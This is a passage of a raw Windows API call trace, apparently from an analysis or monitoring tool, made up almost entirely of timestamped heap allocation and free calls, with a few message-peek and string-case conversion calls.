out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0171.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.624] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0171.624] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0171.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0171.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0171.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0171.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0171.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0171.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0171.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0171.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0171.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0171.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0171.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0171.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0171.627] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0171.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0171.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0171.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0171.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0171.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0171.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0171.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0171.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0171.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0171.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0171.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0171.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0171.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0171.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0171.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0171.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 